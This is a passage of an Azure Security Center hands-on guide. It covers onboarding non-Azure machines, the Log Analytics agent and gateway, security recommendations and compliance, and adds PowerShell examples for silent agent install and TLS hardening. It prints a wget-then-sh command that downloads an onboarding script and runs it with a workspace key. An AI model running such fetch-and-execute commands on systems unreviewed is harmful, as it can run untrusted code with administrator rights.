Security Center.

You can review the complete list of Azure Defender alerts here.

2.8 Azure Security Center threat intelligence report
What is a threat intelligence report?

Security Center threat protection works by monitoring security information from your Azure
resources, the network, and connected partner solutions. It analyzes this information, often
correlating information from multiple sources, to identify threats. For more information,
see How Azure Security Center detects and responds to threats.

When Security Center identifies a threat, it triggers a security alert, which contains detailed
information regarding the event, including suggestions for remediation. To help incident
response teams investigate and remediate threats, Security Center provides threat intelligence
reports containing information about detected threats. The report includes information such as:
• Attacker’s identity or associations (if this information is available)
• Attackers’ objectives
• Current and historical attack campaigns (if this information is available)
• Attackers’ tactics, tools, and procedures
• Associated indicators of compromise (IoC) such as URLs and file hashes
• Victimology, which is the industry and geographic prevalence to assist you in
determining if your Azure resources are at risk
• Mitigation and remediation information

Security Center has three types of threat reports, which can vary according to the attack. The
reports available are:

• Activity Group Report: provides deep dives into attackers, their objectives, and
tactics.
• Campaign Report: focuses on details of specific attack campaigns.
• Threat Summary Report: covers all of the items in the previous two reports.

This type of information is useful during the incident response process, where there's an
ongoing investigation to understand the source of the attack, the attacker’s motivations, and
what to do to mitigate this issue in the future.

How to access the threat intelligence report

1. From Security Center's sidebar, open the Security alerts page.


2. Select an alert. The alerts details page opens with more details about the alert.
Below is the Ransomware indicators detected alert details page.

3. Select the link to the report, and a PDF will open in your default browser.

4. You can optionally download the PDF report.

3 Connect your non-Azure machines to Security Center
The newest method of Azure Security Center onboarding uses Azure Arc for servers. Azure Arc
can be used to onboard resources from any non-Azure environment into Azure, for consistent
management and configuration.

Connect your non-Azure machines to Azure Security Center | Microsoft Docs

You can connect your non-Azure computers in any of the following ways:

• Using Azure Arc (recommended)

• From Security Center's pages in the Azure portal (Getting started and Inventory)

Add non-Azure machines with Azure Arc


Azure Arc is the preferred way of adding your non-Azure machines to Azure Security Center.

A machine with Azure Arc enabled becomes an Azure resource and appears in Security Center
with recommendations like your other Azure resources.

In addition, Azure Arc provides enhanced capabilities such as the option to enable policies on
the machine, deploy the Log Analytics agent as an extension, simplify deployment with other
Azure services, and more.

Prerequisites

• If you don't have an Azure subscription, create a free account before you begin.
• Deploying the Arc enabled servers Hybrid Connected Machine agent requires
administrator permissions on the machine to install and configure the agent: on
Linux, the root account, and on Windows, an account that is a member of
the Local Administrators group.
• Before you get started, be sure to review the agent prerequisites and verify the following:

▪ Your target machine is running a supported operating system.
▪ Your account is granted assignment to the required Azure roles.
▪ If the machine connects through a firewall or proxy server to
communicate over the Internet, make sure the URLs listed are not
blocked.
▪ Azure Arc enabled servers supports only the regions specified here.

Use Azure Cloud Shell

Azure hosts Azure Cloud Shell, an interactive shell environment that you can use through your
browser. You can use either Bash or PowerShell with Cloud Shell to work with Azure services.
You can use the Cloud Shell preinstalled commands to run the code in this article without
having to install anything on your local environment.

To start Azure Cloud Shell, use any of these options:

• Select Try It in the upper-right corner of a code block. Selecting Try It doesn't
automatically copy the code to Cloud Shell.
• Go to https://shell.azure.com, or select the Launch Cloud Shell button to open
Cloud Shell in your browser.
• Select the Cloud Shell button on the menu bar at the upper right in the Azure portal.

To run the code in this article in Azure Cloud Shell:

1. Start Cloud Shell.


2. Select the Copy button on a code block to copy the code.
3. Paste the code into the Cloud Shell session by selecting Ctrl+Shift+V on Windows
and Linux or by selecting Cmd+Shift+V on macOS.
4. Select Enter to run the code.

Register Azure resource providers

Azure Arc enabled servers depends on the following Azure resource providers in your subscription in
order to use this service:

• Microsoft.HybridCompute
• Microsoft.GuestConfiguration

Register them using the following commands:

az account set --subscription "{Your Subscription Name}"
az provider register --namespace 'Microsoft.HybridCompute'
az provider register --namespace 'Microsoft.GuestConfiguration'

Generate installation script

The script that automates the download and installation of the agent and establishes the
connection with Azure Arc is available from the Azure portal. To complete the process, do the following:

1. Launch the Azure Arc service in the Azure portal by clicking All services, then
searching for and selecting Servers - Azure Arc.

2. On the Servers - Azure Arc page, select Add at the upper left.
3. On the Select a method page, select the Add servers using interactive script tile, and
then select Generate script.
4. On the Generate script page, select the subscription and resource group where you
want the machine to be managed within Azure. Select an Azure location where the
machine metadata will be stored. This location can be the same as or different from the
resource group's location.
5. On the Prerequisites page, review the information and then select Next: Resource
details.
6. On the Resource details page, provide the following:

1. In the Resource group drop-down list, select the resource group the
machine will be managed from.
2. In the Region drop-down list, select the Azure region to store the
servers metadata.
3. In the Operating system drop-down list, select the operating system
that the script will be configured to run on.
4. If the machine is communicating through a proxy server to connect to
the internet, specify the proxy server IP address or the name and port
number that the machine will use to communicate with the proxy server.
Enter the value in the format http://<proxyURL>:<proxyport>.
5. Select Next: Tags.
7. On the Tags page, review the default Physical location tags suggested and enter a
value, or specify one or more Custom tags to support your standards.
8. Select Next: Download and run script.
9. On the Download and run script page, review the summary information, and then
select Download. If you still need to make changes, select Previous.

Install the agent using the script

Windows agent

1. Log in to the server.


2. Open an elevated 64-bit PowerShell command prompt.
3. Change to the folder or share that you copied the script to, and execute it on the
server by running the ./OnboardingScript.ps1 script.

Linux agent

1. To install the Linux agent on a target machine that can communicate directly with
Azure, run the following command:

bash ~/Install_linux_azcmagent.sh

   o If the target machine communicates through a proxy server, run the
   following command instead:

bash ~/Install_linux_azcmagent.sh --proxy "{proxy-url}:{proxy-port}"

Verify the connection with Azure Arc

After you install the agent and configure it to connect to Azure Arc enabled servers, go to the Azure
portal to verify that the server has successfully connected. View your machine in the Azure portal.

Add non-Azure Windows Machines with Getting started

Prerequisites

Azure Defender for servers must be enabled before starting this quickstart. See Upgrade to
Azure Defender - Azure Security Center for upgrade instructions. You can try Azure Defender at
no cost for the first 30 days.

Add a new Windows computer

1. Sign into the Azure portal.


2. On the Microsoft Azure menu, select Security Center
3. Select the Getting started blade on the left
4. Select the Get started tab
5. Under the heading Add non-Azure servers, select Configure.

6. On Onboard servers to Security Center, a list of your Log Analytics workspaces is
shown. The list includes, if applicable, the default workspace created for you by Security
Center when automatic provisioning was enabled. Select this workspace or another
workspace you wish to use. If a workspace isn't enabled for Security Center, it can be
upgraded using the upgrade button instead.

7. The Agents Management blade opens with a link for downloading a Windows agent and
keys for your workspace ID to use in configuring the agent.

8. Select the Download Windows Agent link applicable to your processor type to download
the setup file.

9. On the right of Workspace ID, select the copy icon and paste the ID into Notepad.

10. On the right of Primary Key, select the copy icon and paste the key into Notepad.

You’ll need the Workspace ID and the key when installing the agent.

Install the agent

You must now install the downloaded agent on the target computer.

1. Copy the file to the target computer and Run Setup.


2. On the Welcome page, select Next.

3. On the License Terms page, read the license and then select I Agree.
4. On the Destination Folder page, change or keep the default installation folder and then
select Next.
5. On the Agent Setup Options page, choose to connect the agent to Azure Log Analytics
(OMS) and then select Next.
6. On the Azure Log Analytics page, paste the Workspace ID and Workspace Key
(Primary Key) that you copied into Notepad in the previous procedure.
7. If the computer should report to a Log Analytics workspace in Azure Government cloud,
select Azure US Government form the Azure Cloud dropdown list. If the computer needs
to communicate through a proxy server to the Log Analytics service, select Advanced and
provide the URL and port number of the proxy server.

8. Select Next once you have completed providing the necessary configuration settings.

9. On the Ready to Install page, review your choices and then select Install.
10. On the Configuration completed successfully page, select Finish.

When complete, the Microsoft Monitoring Agent appears in Control Panel. You can
review your configuration there and verify that the agent is connected.
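The wizard above is the interactive path. When the same agent has to go onto many servers, the documented MSI public properties of the agent's setup.exe let you script it. The following is an added example and not part of this guide: it builds the silent install command line from the Workspace ID and Primary Key you copied in the previous procedure, runs the installer, and then asks the agent's own configuration COM object whether it is connected to the workspace (the same check the Control Panel applet performs). The function names, the setup file path, and the placeholder workspace values are assumptions; OPINSIGHTS_PROXY_URL is optional and is where a proxy, or the Log Analytics gateway address described later in this guide, would go.

```powershell
# Added example (not from the guide): unattended Microsoft Monitoring Agent install
# using the agent's documented MSI properties, then a connection check.
# Placeholders: the setup path, <WORKSPACE-ID> and <PRIMARY-KEY> are yours to supply.

function Get-MmaInstallArguments {
    param(
        [Parameter(Mandatory)] [string] $WorkspaceId,
        [Parameter(Mandatory)] [string] $WorkspaceKey,
        # Documented values: 0 = Azure commercial cloud, 1 = Azure US Government
        [ValidateSet(0, 1)] [int] $CloudType = 0,
        # Optional proxy (or Log Analytics gateway), e.g. http://10.0.0.5:8080
        [string] $ProxyUrl
    )
    # /qn keeps the installer silent; the remaining entries are MSI public properties.
    $msiProps = @(
        '/qn',
        'NOAPM=1',                                   # skip the APM component
        'ADD_OPINSIGHTS_WORKSPACE=1',
        "OPINSIGHTS_WORKSPACE_AZURE_CLOUD_TYPE=$CloudType",
        "OPINSIGHTS_WORKSPACE_ID=`"$WorkspaceId`"",
        "OPINSIGHTS_WORKSPACE_KEY=`"$WorkspaceKey`"",
        'AcceptEndUserLicenseAgreement=1'
    )
    if ($ProxyUrl) { $msiProps += "OPINSIGHTS_PROXY_URL=`"$ProxyUrl`"" }
    return $msiProps
}

function Install-MmaAgent {
    param(
        [Parameter(Mandatory)] [string] $SetupPath,   # e.g. C:\Temp\MMASetup-AMD64.exe (assumed)
        [Parameter(Mandatory)] [string] $WorkspaceId,
        [Parameter(Mandatory)] [string] $WorkspaceKey,
        [int] $CloudType = 0,
        [string] $ProxyUrl
    )
    $arguments = Get-MmaInstallArguments -WorkspaceId $WorkspaceId -WorkspaceKey $WorkspaceKey `
                                         -CloudType $CloudType -ProxyUrl $ProxyUrl
    # -Wait -PassThru returns the process so the exit code can be inspected.
    $proc = Start-Process -FilePath $SetupPath -ArgumentList $arguments -Wait -PassThru -NoNewWindow
    if ($proc.ExitCode -ne 0) {
        throw "Agent setup exited with code $($proc.ExitCode)"
    }
}

function Test-MmaWorkspace {
    param([Parameter(Mandatory)] [string] $WorkspaceId)
    # The agent exposes its configuration through the AgentConfigManager.MgmtSvcCfg COM object.
    $mma = New-Object -ComObject 'AgentConfigManager.MgmtSvcCfg'
    $ws = $mma.GetCloudWorkspaces() | Where-Object { $_.workspaceId -eq $WorkspaceId }
    if (-not $ws) { return $false }          # workspace was never added to the agent
    # ConnectionStatus 0 is the "Connected" state shown in the Control Panel applet.
    return ($ws.ConnectionStatus -eq 0)
}

# Usage (placeholders): install, then verify after the agent has had time to register.
# Install-MmaAgent -SetupPath 'C:\Temp\MMASetup-AMD64.exe' -WorkspaceId '<WORKSPACE-ID>' -WorkspaceKey '<PRIMARY-KEY>'
# Test-MmaWorkspace -WorkspaceId '<WORKSPACE-ID>'
```

Keep the Primary Key out of scripts committed to source control; it is a shared secret that lets any host send data into your workspace. Pass it in from a secret store or a protected pipeline variable instead, and rotate it from the workspace's Agents management blade if it is ever exposed.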

Add non-Azure Linux Machines with Getting started

Prerequisites

You must be on Security Center’s Standard pricing tier before starting this QuickStart. See
Onboard your Azure subscription to Security Center Standard for upgrade instructions. You
can try Security Center’s Standard at no cost for the first 30 days.

Add new Linux computer

1. Sign into the Azure portal.
2. On the Microsoft Azure menu, select Security Center. Select Getting started.
3. Under the Add non-Azure computers section, select Configure.

4. On Onboard servers to Security Center, a list of your Log Analytics workspaces is
shown. The list includes, if applicable, the default workspace created for you by Security
Center when automatic provisioning was enabled. Select this workspace or another
workspace you wish to use and hit +Add Servers next to it.

5. Select the Linux tab on the Agents management blade.

6. If you click Download Linux Agent, you will be redirected to GitHub for the agent install
files and instructions to install the agent.
Alternatively, you can copy and paste the wget command from the page and run it
directly in a command shell. The wget command includes the workspace ID and key for
you already.

Example:

Run the following commands to download the omsagent, validate the checksum, and
install+onboard the agent. Commands are for 64-bit.

The Workspace ID and Primary Key can be found inside the OMS Portal under Settings in the
connected sources tab.

$> wget https://raw.githubusercontent.com/Microsoft/OMS-Agent-for-Linux/master/installer/scripts/onboard_agent.sh && sh onboard_agent.sh -w <YOUR OMS WORKSPACE ID> -s <YOUR OMS WORKSPACE PRIMARY KEY>

Install the agent

1. Connect to your Azure Linux server and run the copied wget command from the
agent installation page:

wget https://raw.githubusercontent.com/Microsoft/OMS-Agent-for-Linux/master/installer/scripts/onboard_agent.sh && sh onboard_agent.sh -w <YOUR OMS WORKSPACE ID> -s <YOUR OMS WORKSPACE PRIMARY KEY>

Note: The demo steps below were performed from a Windows 10 computer
running Windows Subsystem for Linux. See Installing Bash on Ubuntu on
Windows 10 for further details on the WSL.

2. Once the installation is finished, you can validate that the omsagent is installed by
running the pgrep command. The command will return the omsagent PID (Process ID) as
shown below:

The logs for the Security Center Agent for Linux can be found at:
/var/opt/microsoft/omsagent//log/

After some time - it may take up to 30 minutes - the new Linux computer will appear in Security
Center.

You can use the Inventory view to quickly identify and assess the state of an individual
computer.

(click a computer to see status)

Clean up resources

When no longer needed, you can remove the agent from the Linux computer.

To remove the agent:

1. Download the Linux agent universal script to the computer.

2. Run the bundle .sh file with the --purge argument on the computer, which completely
removes the agent and its configuration.

sudo sh ./omsagent-<version>.universal.x64.sh --purge

Connecting computers to Log Analytics gateway

The Log Analytics gateway is an HTTP forward proxy that supports HTTP tunneling using the
HTTP CONNECT command. This gateway sends data to Azure Automation and a Log Analytics
workspace in Azure Monitor on behalf of the computers that cannot directly connect to the
internet.

The Log Analytics gateway supports:

• Reporting up to the same four Log Analytics workspace agents that are behind it and that
are configured with Azure Automation Hybrid Runbook Workers.
• Windows computers on which the Microsoft Monitoring Agent is directly connected to a
Log Analytics workspace in Azure Monitor.
• Linux computers on which a Log Analytics agent for Linux is directly connected to a Log
Analytics workspace in Azure Monitor.
• System Center Operations Manager 2012 SP1 with UR7, Operations Manager 2012 R2 with
UR3, or a management group in Operations Manager 2016 or later that is integrated with
Log Analytics.

The computer that runs the Log Analytics gateway requires the Log Analytics Windows agent to
identify the service endpoints that the gateway needs to communicate with. The agent also
needs to direct the gateway to report to the same workspaces that the agents or Operations
Manager management group behind the gateway are configured with. This configuration allows
the gateway and the agent to communicate with their assigned workspace.

System Requirements

Computers designated to run the Log Analytics gateway must have the following configuration:

• Windows 10, Windows 8.1, or Windows 7
• Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server
2012, Windows Server 2008 R2, or Windows Server 2008
• Microsoft .NET Framework 4.5
• At least a 4-core processor and 8 GB of memory
• A Log Analytics agent for Windows that is configured to report to the same workspace
as the agents that communicate through the gateway

Supported encryption protocols

The Log Analytics gateway supports only Transport Layer Security (TLS) 1.0, 1.1, and 1.2. It
doesn't support Secure Sockets Layer (SSL). To ensure the security of data in transit to Log
Analytics, configure the gateway to use at least TLS 1.2. Older versions of TLS or SSL are
vulnerable. Although they currently allow backward compatibility, avoid using them.

For additional information, review Sending data securely using TLS 1.2.

Supported number of agent connections

The following table shows approximately how many agents can communicate with a gateway
server. Support is based on agents that upload about 200 KB of data every 6 seconds. For each
agent tested, data volume is about 2.7 GB per day.

Gateway                                                        Agents supported (approximate)
CPU: Intel Xeon Processor E5-2660 v3 @ 2.6 GHz, 2 cores        600
Memory: 4 GB
Network bandwidth: 1 Gbps

CPU: Intel Xeon Processor E5-2660 v3 @ 2.6 GHz, 4 cores        1000
Memory: 8 GB
Network bandwidth: 1 Gbps

Steps:

01. Sign into the Azure portal at https://portal.azure.com

02. In the Azure portal, click All services. In the list of resources, type Log
Analytics. As you begin typing, the list filters based on your input. Select Log
Analytics workspaces.

03. Find the Sentinel Log Analytics workspace, such as SentinelWorkspace.

04. Select the SentinelWorkspace.

05. In your workspace blade, under General, select Quick Start.

06. Under Choose a data source to connect to the workspace, select Computers.

07. In the Direct Agent blade, select Download Log Analytics gateway.

08. Copy the Log Analytics gateway.msi to your Log Analytics gateway server.

09. From the destination folder, double-click Log Analytics gateway.msi.

10. On the Welcome page, select Next.

11. On the License Agreement page, select I accept the terms in the License
Agreement to agree to the Microsoft Software License Terms, and then
select Next.
12. On the Port and proxy address page:

a. Enter the TCP port number to be used for the gateway. Setup uses this port
number to configure an inbound rule on Windows Firewall. The default value is 8080.
The valid range of the port number is 1 through 65535. If the input does not fall into
this range, an error message appears.

b. If the server where the gateway is installed needs to communicate through a
proxy, enter the proxy address where the gateway needs to connect. For example,
enter http://myorgname.corp.contoso.com:80. If you leave this field blank, the
gateway will try to connect to the internet directly. If your proxy server requires
authentication, enter a username and password.

13. Select Next.

14. If you do not have Microsoft Update enabled, the Microsoft Update page
appears, and you can choose to enable it. Make a selection and then
select Next. Otherwise, continue to the next step.
15. On the Destination Folder page, either leave the default folder C:\Program
Files\OMS Gateway or enter the location where you want to install the gateway.
Then select Next.
16. On the Ready to install page, select Install. If User Account Control requests
permission to install, select Yes.
17. After Setup finishes, select Finish. To verify that the service is running, open the
services.msc snap-in and verify that OMS Gateway appears in the list of
services and that its status is Running.

18. After you install the Log Analytics agent on the gateway server, configure it to
report to the Sentinel workspace. If the Log Analytics Windows agent is not
installed on the gateway, event 300 is written to the OMS Gateway event log,
indicating that the agent needs to be installed. If the agent is installed but not
configured to report to the same workspace as the agents that communicate
through it, event 105 is written to the same log, indicating that the agent on
the gateway needs to be configured to report to the same workspace as the
agents that communicate with the gateway.

19. After you complete configuration, restart the OMS Gateway service to apply
the changes. Otherwise, the gateway will reject agents that attempt to
communicate with Log Analytics and will report event 105 in the OMS Gateway
event log. This will also happen when you add or remove a workspace from the
agent configuration on the gateway server.
20. For configuring the Log Analytics agent on Windows servers that will send
telemetry to the Log Analytics gateway, replace the proxy server value with the
IP address of the Log Analytics gateway server and its port number.

21. For configuring the Log Analytics agent on Linux servers that will send telemetry
to the Log Analytics gateway, replace the proxy server value with the IP address
of the Log Analytics gateway server and its port number.
Example: https://proxy01.contoso.com:port
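The "Supported encryption protocols" section above says to configure the gateway for at least TLS 1.2, and steps 17 to 19 describe the service and event-log checks (events 105 and 300). The following added example, which is not part of this guide, does both on the gateway host: it turns off the older SCHANNEL protocol versions that Windows would otherwise still offer, tells the .NET Framework (which the gateway is built on) to follow the operating-system default, and then reports the service state and whether either diagnostic event has been logged. The function names, the "OMS Gateway Log" event-log name and the service display name "OMS Gateway" (taken from step 17) are assumptions to check against your own server; the registry paths are the standard Windows SCHANNEL and .NET locations.

```powershell
# Added example (not from the guide): restrict the Log Analytics gateway host to TLS 1.2
# and verify the gateway afterwards. Run elevated; SCHANNEL changes need a reboot.

$SchannelRoot = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols'

function Set-TlsProtocolState {
    param(
        [Parameter(Mandatory)]
        [ValidateSet('SSL 2.0', 'SSL 3.0', 'TLS 1.0', 'TLS 1.1', 'TLS 1.2')]
        [string] $Protocol,
        [Parameter(Mandatory)] [bool] $Enabled
    )
    # Windows keeps a Client and a Server subkey per protocol. The gateway is a server
    # to the agents behind it and a client to Log Analytics, so both sides are set.
    foreach ($side in 'Client', 'Server') {
        $key = Join-Path $SchannelRoot "$Protocol\$side"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        New-ItemProperty -Path $key -Name 'Enabled' -PropertyType DWord `
            -Value ([int]$Enabled) -Force | Out-Null
        New-ItemProperty -Path $key -Name 'DisabledByDefault' -PropertyType DWord `
            -Value ([int](-not $Enabled)) -Force | Out-Null
    }
}

function Enable-DotNetStrongCrypto {
    # Makes .NET 4.x applications (the gateway among them) negotiate the OS default
    # protocol rather than falling back to TLS 1.0. Both 64-bit and 32-bit hives are set.
    foreach ($root in 'HKLM:\SOFTWARE\Microsoft\.NETFramework\v4.0.30319',
                      'HKLM:\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319') {
        if (Test-Path $root) {
            New-ItemProperty -Path $root -Name 'SchUseStrongCrypto' -PropertyType DWord -Value 1 -Force | Out-Null
            New-ItemProperty -Path $root -Name 'SystemDefaultTlsVersions' -PropertyType DWord -Value 1 -Force | Out-Null
        }
    }
}

function Test-OmsGateway {
    # $LogName is an assumption; use the name Event Viewer shows under Applications and Services Logs.
    param([string] $LogName = 'OMS Gateway Log')
    $result = [ordered]@{ ServiceRunning = $false; AgentMissing = $false; WorkspaceMismatch = $false }
    $svc = Get-Service -DisplayName 'OMS Gateway' -ErrorAction SilentlyContinue
    $result.ServiceRunning = [bool]($svc -and $svc.Status -eq 'Running')
    # Event 300: no Log Analytics agent installed on the gateway.
    # Event 105: the gateway's agent reports to a different workspace than the agents behind it.
    $events = Get-WinEvent -FilterHashtable @{ LogName = $LogName; Id = 105, 300 } `
                           -MaxEvents 50 -ErrorAction SilentlyContinue
    $result.AgentMissing      = [bool]($events | Where-Object Id -eq 300)
    $result.WorkspaceMismatch = [bool]($events | Where-Object Id -eq 105)
    return [pscustomobject]$result
}

# Usage: disable the legacy protocols, keep TLS 1.2, reboot, then run Test-OmsGateway.
foreach ($p in 'SSL 2.0', 'SSL 3.0', 'TLS 1.0', 'TLS 1.1') { Set-TlsProtocolState -Protocol $p -Enabled $false }
Set-TlsProtocolState -Protocol 'TLS 1.2' -Enabled $true
Enable-DotNetStrongCrypto
Test-OmsGateway
```

Because the gateway terminates the agents' connections, disabling TLS 1.0 and 1.1 on it also means every agent behind it must be able to speak TLS 1.2; check older Windows Server 2008 R2 or 2012 hosts first, as those need the same strong-crypto settings before they will connect.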

Onboard Windows computers through Windows Admin Center (WAC)
Windows Admin Center is a management tool for your Windows servers. It's a single location for
system administrators to access the majority of the most commonly used admin tools. From
within Windows Admin Center, you can directly onboard your on-prem servers into Azure
Security Center. You can then view a summary of your security recommendations and alerts
directly in the Windows Admin Center experience.

When you've successfully onboarded a server from Windows Admin Center to Azure Security
Center, you can:

• View security alerts and recommendations inside the Security Center extension in
Windows Admin Center
• View the security posture and retrieve additional detailed information of your Windows
Admin Center managed servers in Security Center within the Azure portal (or via an API)

By combining these two tools, Security Center becomes your single pane of glass to view all
your security information, whatever the resource: protecting your Windows Admin Center
managed on-prem servers, your VMs, and any additional PaaS workloads.

1. If Windows Admin Center is not installed, follow the link to download and install
it: https://www.microsoft.com/en-us/cloud-platform/windows-admin-center
2. From Windows Admin Center, select one of your servers, and in the Tools pane, select
the Azure Security Center extension:

3. Click the Sign into Azure and set up button.

4. Follow the steps to register your server.

5. Log on with your credentials and get back to the WAC page. Now select the AAD tenant
ID where you want to connect your server:

6. Choose Create new to create a new Azure Active Directory application and click
Connect.

7. Click on the link and proceed to the Azure portal to grant admin consent.

8. Get back to the WAC page and click the Sign into Azure and set up button once more. You
should get to the Azure Security Center page and see details about the server you’re logged
on to.

Clean up resources

When no longer needed, you can remove the agent from the Windows computer.

To remove the agent:

1. Open Control Panel.
2. Open Programs and Features.
3. In Programs and Features, select Microsoft Monitoring Agent and click Uninstall.

4 Monitor Security Health
In this hands-on, we will review the security state of your resources by reviewing the
recommendations and your asset inventory in the customer’s subscription. Recommendations
for next-generation firewalls (NGFWs) are out of scope as those are third-party product
implementations.

Each customer environment will have different recommendations based on what they’ve
deployed and how they’ve secured it. The idea here is to walk through each recommendation
and discuss it with the customer.

https://docs.microsoft.com/en-us/azure/security-center/security-center-recommendations

https://docs.microsoft.com/en-us/azure/security-center/asset-inventory

4.1 Resource security Hygiene

What are security recommendations?

Recommendations are actions for you to take in order to secure your resources.

Security Center periodically analyzes the security state of your Azure resources to identify
potential security vulnerabilities. It then provides you with recommendations on how to
remediate those vulnerabilities.

Each recommendation provides you with:

• A short description of the issue
• The remediation steps to carry out in order to implement the recommendation
• The affected resources

Monitor Recommendations

Security Center analyzes the security state of your resources to identify potential vulnerabilities.

1. From Security Center's menu, open the Recommendations page to see the
recommendations applicable to your environment. Recommendations are grouped
into security controls.

Expand a control and select a specific recommendation to view the recommendation details
page.

The page includes:

A. Enforce and Deny buttons on supported recommendations (see Prevent
misconfigurations with Enforce/Deny recommendations)
B. Severity indicator
C. Freshness interval (where relevant)
D. Description - A short description of the issue
E. Remediation steps - A description of the manual steps required to remediate the
security issue on the affected resources. For recommendations with 'quick fix', you
can select View remediation logic before applying the suggested fix to your
resources.
F. Affected resources - Your resources are grouped into tabs:
• Healthy resources – Relevant resources which either aren't impacted or on which
you've already remediated the issue.
• Unhealthy resources – Resources which are still impacted by the identified issue.
• Not applicable resources – Resources for which the recommendation can't give
a definitive answer. The not applicable tab also includes reasons for each
resource.
G. Action buttons to remediate the recommendation or trigger a logic app.

4.2 Compute Health and Inventory
The asset inventory page of Azure Security Center provides a single page for viewing the
security posture of the resources you've connected to Security Center.

Review the key features of asset Inventory

Walk through the asset inventory page and explore the following tools:

• Summaries - Before you define any filters, a prominent strip of values at the top of
the inventory view shows:
o Total resources: The total number of resources connected to Security
Center.
o Unhealthy resources: Resources with active security
recommendations. Learn more about security recommendations.
o Unmonitored resources: Resources with agent monitoring issues - they
have the Log Analytics agent deployed, but the agent isn't sending data
or has other health issues.
• Filters - The multiple filters at the top of the page provide a way to quickly refine
the list of resources according to the question you're trying to answer. For
example, if you wanted to answer the question Which of my machines with the tag
'Production' are missing the Log Analytics agent? you could combine the Agent
monitoring filter with the Tags

How to use asset inventory

1. From Security Center's sidebar, select Inventory.

2. Use the Filter by name box to display a specific resource, or use the filters as
described below.
3. Select the relevant options in the filters to create the specific query you want to
perform.

By default, the resources are sorted by the number of active security
recommendations.

Important

The options in each filter are specific to the resources in the currently selected
subscriptions and your selections in the other filters.

For example, if you've selected only one subscription, and the subscription has no
resources with outstanding security recommendations to remediate (0 unhealthy
resources), the Recommendations filter will have no options.

4. To use the Security findings contain filter, enter free text from the ID, security
check, or CVE name of a vulnerability finding to filter to the affected resources:

Tip

The Security findings contain and Tags filters only accept a single value. To filter
by more than one, use Add filters.

5. To use the Azure Defender filter, select one or more options (Off, On, or Partial):
o Off - Resources that aren't protected by an Azure Defender plan. You
can right click on any of these and upgrade them:
o On - Resources that are protected by an Azure Defender plan
o Partial - This applies to subscriptions that have some but not all of
the Azure Defender plans disabled. For example, the following
subscription has five Azure Defender plans disabled.

6. To further examine the results of your query, select the resources that interest you.
7. To view the current selected filter options as a query in Resource Graph Explorer,
select View in resource graph explorer.

How often does Security Center scan for operating system vulnerabilities, system
updates, and endpoint protection issues?

The latency in Security Center scans for vulnerabilities, updates, and issues is:

• Operating system security configurations – data is updated within 48 hours
• System updates – data is updated within 24 hours
• Endpoint Protection issues – data is updated within 8 hours

Security Center typically scans for new data every hour. The latency values above are a
worst-case scenario where there is not a recent scan, or a scan failed.

4.3 Implement Security Recommendations

Pick a couple of recommendations to implement from the below sections. Generally, a lack of
anti-malware is the easiest as this can be deployed right out of the Azure portal. Also, providing
security contact details is important for subscriptions. Enabling SQL auditing and enabling NSGs
are also easy remediations. Remediations should be done on non-production systems.

4.4 Review and Implement Security Recommendations
Review the recommendations from the Inventory and Recommendations page. Try using
the filtering capabilities to look for specific recommendations. Verify your agent monitoring
health for your resources and the state of your Azure Defender protection.

In the Recommendations page review the health of your resources.

1. Manage Security Recommendations in ASC https://docs.microsoft.com/en-
us/azure/security-center/security-center-recommendations
2. Install endpoint protection https://docs.microsoft.com/en-us/azure/security-
center/security-center-install-endpoint-protection
3. System Updates https://docs.microsoft.com/en-us/azure/security-center/security-center-
apply-system-updates
4. SQL Auditing and Threat Detection SQL PaaS: https://docs.microsoft.com/en-
us/azure/security-center/security-center-enable-auditing-on-sql-databases or SQL IaaS:
https://docs.microsoft.com/en-us/azure/security-center/security-center-enable-auditing-
on-sql-servers
5. Enable NSGs https://docs.microsoft.com/en-us/azure/security-center/security-center-
enable-network-security-groups

5 Regulatory Compliance
Azure Security Center helps streamline the process for meeting regulatory compliance
requirements, using the Regulatory compliance dashboard. In the dashboard, Security Center
provides insights into your compliance posture based on continuous assessments of your Azure
environment. The assessments performed by Security Center analyze risk factors in your hybrid
cloud environment in accordance with security best practices. These assessments are mapped to
compliance controls from a supported set of standards. In the Regulatory compliance
dashboard, you have a clear view of the status of all these assessments within your environment
in the context of a particular standard or regulation. As you act on the recommendations and
reduce risk factors in your environment, you can see your compliance posture improve.

5.1 Assessing your regulatory compliance

Security Center continuously assesses the configuration of your resources to identify security
issues and vulnerabilities. These assessments are presented as recommendations, which focus
on improving your security hygiene. In the Regulatory compliance dashboard, you can view a set
of compliance standards with all their requirements, where supported requirements are mapped
to applicable security assessments. This enables you to view your compliance posture with
respect to the standard, based on the status of these assessments.

The regulatory compliance dashboard view can help focus your attention on the gaps in
compliance with a standard or regulation that is important to you. This focused view also
enables you to continuously monitor your compliance score over time within dynamic cloud and
hybrid environments.

Note: By default, Security Center supports the following regulatory standards: Azure CIS,
PCI DSS 3.2, ISO 27001, and SOC TSP.
The dynamic compliance packages (preview) feature allows you to upgrade the
standards shown in your regulatory compliance dashboard to the new dynamic
packages. You can also use the same preview feature to add new compliance packages
and monitor your compliance with additional standards.

Explore the Compliance dashboard

1. From Security Center's menu, select Regulatory compliance.

At the top of the screen, you see a dashboard with an overview of your compliance
status with the set of supported compliance regulations. You can see your overall
compliance score, and the number of passing vs. failing assessments associated
with each standard.

2. Select a tab for a compliance standard that is relevant to you (1). You'll see which
subscriptions the standard is applied on (2), and the list of all controls for that
standard (3). For the applicable controls, you can view the details of passing and
failing assessments associated with that control (4), as well as the numbers of
affected resources (5). Some controls are grayed out. These controls don't have any
Security Center assessments associated with them. Check the requirements for
these and assess them in your environment on your own. Some of these may be
process-related and not technical.

3. To generate and download a PDF report summarizing your current compliance
status for a particular standard, click Download report.

The report provides a high-level summary of your compliance status for the
selected standard based on Security Center assessments data, and is organized
according to the controls of that particular standard. The report can be shared with
relevant stakeholders, and may serve to provide evidence to internal and external
auditors.

Improve your compliance posture

Given the information in the regulatory compliance dashboard, you can improve your
compliance posture by resolving recommendations directly within the dashboard.

1. Click through any of the failing assessments that appear in the dashboard to view
the details for that recommendation. Each recommendation includes a set of
remediation steps that should be followed to resolve the issue.
2. You can select a particular resource to view more details and resolve the
recommendation for that resource.
For example, in the Azure CIS 1.1.0 (New) standard, you can select the
recommendation Disk encryption should be applied on virtual machines.

3. In this example, when you select Take action from the recommendation details page,
you arrive in the Azure Virtual Machine pages of the Azure portal, where you can open
the Security tab and enable encryption:

